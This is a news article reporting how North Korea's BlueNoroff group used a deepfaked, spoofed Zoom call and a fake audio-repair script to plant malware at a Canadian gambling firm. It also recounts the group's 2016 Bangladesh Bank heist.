North Korean Hackers Impersonate Zoom to Breach Gambling Firm

Posted on: June 24, 2025, 08:08h. 

Last updated on: June 24, 2025, 09:22h.

Philip Conneller @casinoorgphilc Read More
Expertise: Gaming Business, Regulation, Tribal Gaming.
  • Hackers used deepfakes in a spoofed Zoom meeting
  • Victim ran fake support script that installed malware
  • Attackers stole credentials, crypto data, and messaging info

A representative of a Canadian online gambling provider who believed they were conducting a routine Zoom call with a known contact was actually talking to North Korean hackers on a spoofed version of the communications platform.

BlueNoroff, Lazarus Group, Zoom phishing attack, Cryptocurrency theft, Deepfake social engineering
The North Korea-backed BlueNoroff group created a fake website that looked like an official Zoom support page to target a Canadian gaming company, according to analysts. (Image: Shutterstock)

The unnamed company was hit by BlueNoroff on May 28, a subgroup of the notorious North Korea-backed hacker group Lazarus Group, according to Field Effect Analysis.

BlueNoroff is a financially motivated threat actor that typically targets banks and crypto exchanges, as well as gaming and entertainment industries, and fintech companies, to raise revenue for North Korea.

The group has stolen more than US$1.3 billion since 2017, largely through SWIFT banking thefts and crypto heists.

Deep Fake

Field Effect said that BlueNoroff created a fake website that looked like an official Zoom support page to target the gaming company. The attackers spoofed a real business contact and set up a Zoom call with the victim using deep-fake technology.

During the Zoom call, the hackers staged audio issues,” and the victim was told to run a “Zoom audio repair script” to fix the problem. But the script was malware.

Once executed, the script launched a series of downloads and commands, prompting the user for system credentials and silently installing multiple malicious payloads. This allowed the hackers to steal a range of sensitive personal and system data, with a clear focus on cryptocurrency-related assets and messaging data.

The attack appears to be part of a broader Zoom spoofing campaign first spotted in March 2025 that has largely targeted crypto businesses, according to Field Effect.

“It exemplifies an evolving pattern in which financially motivated threat actors continue refining their tradecraft, embedding malicious activity within legitimate business workflows and exploiting user trust as the primary attack surface,” the analysts wrote.

Bangladesh Bank Heist

BlueNorroff’s crowning glory came, notoriously, in February 2016, when the group successfully introduced malware into the servers of the Bangladesh Bank. This helped them obtain credentials to authorize 35 requests for transfers from the New York Fed to accounts in the Philippines and Sri Lanka, totaling almost $1 billion.

Five of the 35 payments, totaling US$101 million, were processed before someone at the New York Fed smelled a rat and blocked further transactions.

Around $20 million ended up in Sri Lanka and was quickly recovered. The rest was transferred to four accounts at Philippine bank RCBC, which had been opened the same day under false names. From there it made its way into the lightly regulated Philippine casino industry where it was laundered at VIP gaming tables, before disappearing without a trace.